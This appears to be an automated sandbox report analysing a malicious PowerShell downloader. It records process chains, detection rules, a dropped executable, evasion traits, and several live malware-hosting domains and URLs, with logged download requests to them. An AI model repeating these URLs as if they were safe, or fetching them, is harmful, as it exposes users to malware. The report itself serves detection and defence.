
Windows Analysis Report
ps1001.ps1

Overview

General Information

Sample name: ps1001.ps1
Analysis ID: 1560751
MD5: 5996b2aa1d6b234a48ed62f1ecaae159
SHA1: 4f6e56e34d7da66cb1f9b9ebc707f7fd01764352
SHA256: 100a4c16630356774d7ebee6681d40279fcb4ceabccf194d371af739ca98ce53
Tags: malware, ps1, user-Joker

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 4640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • csc.exe (PID: 4508 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • cvtres.exe (PID: 2072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 4640 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 4640 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen

    System Summary

    Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4640, TargetFilename: C:\Users\Public\509.exe
    Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", ProcessId: 4640, ProcessName: powershell.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4640, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", ProcessId: 4508, ProcessName: csc.exe
    Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4640, TargetFilename: C:\Users\Public\509.exe
    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4640, TargetFilename: C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", ProcessId: 4640, ProcessName: powershell.exe

    Data Obfuscation

    Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4640, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline", ProcessId: 4508, ProcessName: csc.exe
    No Suricata rule has matched


    AV Detection

    Source: ps1001.ps1 | Avira: detected
    Source: http://fenett2018.com | Avira URL Cloud: Label: malware
    Source: http://eastend.jp/bl5kfa | Avira URL Cloud: Label: malware
    Source: http://yourmother4cancer.info | Avira URL Cloud: Label: malware
    Source: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23 | Avira URL Cloud: Label: malware
    Source: http://eastend.jp | Avira URL Cloud: Label: malware
    Source: http://bemnyc.com/u8erijeq | Avira URL Cloud: Label: malware
    Source: http://fenett2018.com/dobgx | Avira URL Cloud: Label: malware
    Source: http://abakus-biuro.net//a9zqemm | Avira URL Cloud: Label: malware
    Source: ps1001.ps1 | ReversingLabs: Detection: 63%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
    Source: global traffic | HTTP traffic detected: GET /bl5kfa HTTP/1.1 | Host: eastend.jp | Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /u8erijeq HTTP/1.1 | Host: bemnyc.com | Connection: Keep-Alive
    Source: Joe Sandbox View | IP Address: 198.185.159.145
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | DNS traffic detected: DNS query: habarimoto24.com
    Source: global traffic | DNS traffic detected: DNS query: fenett2018.com
    Source: global traffic | DNS traffic detected: DNS query: eastend.jp
    Source: global traffic | DNS traffic detected: DNS query: bemnyc.com
    Source: global traffic | DNS traffic detected: DNS query: abakus-biuro.net
    Source: global traffic | DNS traffic detected: DNS query: yourmother4cancer.info
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 22 Nov 2024 08:27:52 GMT | Content-Type: text/html | Content-Length: 2814 | Connection: keep-alive | Vary: Accept-Encoding | Last-Modified: Tue, 25 Jul 2023 10:28:06 GMT | ETag: "afe-6014d2fcf5ab8"
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://abakus-biuro.net
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1 | String found in binary or memory: http://abakus-biuro.net//a9zqemm
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bemnyc.com
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1 | String found in binary or memory: http://bemnyc.com/u8erijeq
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://eastend.jp
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1 | String found in binary or memory: http://eastend.jp/bl5kfa
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fenett2018.com
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1 | String found in binary or memory: http://fenett2018.com/dobgx
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://habarimoto24.com
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.0000025010072000.00000004.00000800.00020000.00000000.sdmp, ps1001.ps1 | String found in binary or memory: http://habarimoto24.com/nh
    Source: powershell.exe, 00000001.00000002.2374538901.0000025010DE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://yourmother4cancer.info
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://yourmother4cancer.info/Nereidae/ZdDZ/umping?HGn3Nw=1932-05-23
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.0000025001842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000001.00000002.2351696748.000002500181C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2351696748.0000025001842000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000001.00000002.2351696748.0000025000227000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001BBD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
    Source: powershell.exe, 00000001.00000002.2374538901.00000250109CD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
    Source: powershell.exe, 00000001.00000002.2351696748.00000250003FE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://status.squarespace.com

    System Summary

    Source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B2B5F78 1_2_00007FFB4B2B5F78
    Source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engine | Classification label: mal96.expl.evad.winPS1@7/14@6/2
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\509.exe
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4584:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lijprhbp.wc4.ps1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: ps1001.ps1 | ReversingLabs: Detection: 63%
    Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ps1001.ps1"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4568.tmp" "c:\Users\user\AppData\Local\Temp\dakef3hk\CSC7EF384CB672F47F5B690A91D9C6EAB3.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, sspicli.dll, srvcli.dll, cscapi.dll, policymanager.dll, msvcp110_win.dll, taskflowdataengine.dll, wintypes.dll, cdp.dll, umpdc.dll, dsreg.dll, cryptsp.dll, onecorecommonproxystub.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, rsaenh.dll, cryptbase.dll, amsi.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, urlmon.dll, iertutil.dll, netutils.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, wininet.dll, kdscli.dll, ntasn1.dll, ncrypt.dll, ntmarta.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Sections loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, version.dll, kernel.appcore.dll, mscoree.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Sections loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.cmdline"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B2B00BD pushad ; iretd 1_2_00007FFB4B2B00C1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B2B7510 push ebx; iretd 1_2_00007FFB4B2B756A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B2B7967 push ebx; retf 1_2_00007FFB4B2B796A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFB4B38240C push 8B485F92h; iretd 1_2_00007FFB4B382411
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dll

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3942
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5889
    Source: C:\Windows\System32\conhost.exe | Window / User API: threadDelayed 432
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\dakef3hk\dakef3hk.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6504 | Thread sleep time: -12912720851596678s >= -30000s
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wVmBbPiVATyasIgjQjvfmfvuAnfHkvJexfMVrlqwolMlxOTkLSwHsNghgaloIPrwkgyyEaKVlAYkxlBpNPdUhgFSRXsnFlvOasnlYTDlMTOWvixCpfVmeugq
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tEventVmNetworkAdapter',
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
    Source: ModuleAnalysisCache.1.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapterX
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wLQRwRlpzoakOpQaqDfknPDRFIKBOgXKGXmpIkcFKCwmWUeeBEKOVFgXXHnXfDUVSHBNLrhSRZRSZqEMUdzxvfEpBkjrVNZCVmNFGWhVNVupZyyqeZtEZyxZ
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapterX
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapterX
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wrzijxHyuhGFSxUJGdbDjLXEhHGEiQYWyPVNsoqvkiWshLClJYjmGxSkrIoEMizPuqperbXCIEdWnmEaMloKmqnLUpJOBpmdzoZjnRnWfyHnVjaKMQWHsPjI
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Add-NetEventVmNetworkAdapter',
    Source: ModuleAnalysisCache.1.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wgwKdqQihUZFLEESAcLtxsVoSsMvfHewvckjGkFkmFLOmVlIHGFSglmyEEEcVIzDjbmgdywAHqAZZkZRrjgLJpmGFQQzOmglXXQHFPyauAwvDwtHuSIRjlXQ
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wJexfMVrlqwolMlxOTkLSwHsNghgaloIPrwkgyyEaKVlAYkxlBpNPdUhgFSRXsnFlvOasnlYTDlMTOWvixCpfVmeugqXQRedYRFvuAtZEVqXkhAeegnlexqk
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wwAGprGrybWUrTbZcxUxIRFFNaEvKmTOMxbmwyeunzKCXihBuYAYUZwrRcdkHEZxynpeqemUZenIQVhvlzXNDfzoSRgSOGmLaSLQrwuSXeCgjvnWojFeRGWB
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wLOWXbDpVDEKwQcAsyFyduqCbkcloPrzijxHyuhGFSxUJGdbDjLXEhHGEiQYWyPVNsoqvkiWshLClJYjmGxSkrIoEMizPuqperbXCIEdWnmEaMloKmqnLUpJ
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wOUvvTqgTtRYFDzucovGCaOAHYsfcAWjUbHnIyOippScsatHdEtoFQMEZQVTeCXISgeBCCELijddizqGSrHpdPbUFWQvCsbicoFBBevMciLqnDXZPTJDpnsY
    Source: powershell.exe, 00000001.00000002.2477577291.000002507955B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wTOMxbmwyeunzKCXihBuYAYUZwrRcdkHEZxynpeqemUZenIQVhvlzXNDfzoSRgSOGmLaSLQrwuSXeCgjvnWojFeRGWBTMcJjWMqwkXVNbDYdRxsPxEboTamj
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wvCsbicoFBBevMciLqnDXZPTJDpnsYLFmTJgnFmkRMmrssAcHQbpwfUmgIjIrWsOLwcHqSocRhDtqAzDiuijcpCRkHSBbAiJWNFdJQWoqUGAWKPgQcQjzdzr
    Source: ModuleAnalysisCache.1.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wNdhzzwMbmpGUlRSbVmcIkyrKagaTwBmaOATzTqfvohUhNCqrjkgBPfmiNtXhZsYIVsQKHOlyaNrZTTYdXHYgtyFaBoOjepDzzkBAGWAtRGAHrPbcljfmvLV
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wJjVemwrdrdzGJxhtAqtdUOBpIDLrALQRwRlpzoakOpQaqDfknPDRFIKBOgXKGXmpIkcFKCwmWUeeBEKOVFgXXHnXfDUVSHBNLrhSRZRSZqEMUdzxvfEpBkj
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wJbglpYmoYIwASoKyXGRoKcihJXQBvgwKdqQihUZFLEESAcLtxsVoSsMvfHewvckjGkFkmFLOmVlIHGFSglmyEEEcVIzDjbmgdywAHqAZZkZRrjgLJpmGFQQ
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'Get-NetEventVmNetworkAdapter',
    Source: powershell.exe, 00000001.00000002.2351696748.00000250008D1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: wavYoeRSMEjdwAYsYdnMvvcWaqICnCnusAbcSxbdjmxOGMotKAUNhJPdfRIqluSzTyHxSZtOyVNDYqTBljtrqxTiqeSNdhzzwMbmpGUlRSbVmcIkyrKagaTw0
    Source: powershell.exe, 00000001.00000002.2351696748.0000025001346000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4640, type: MEMORYSTR
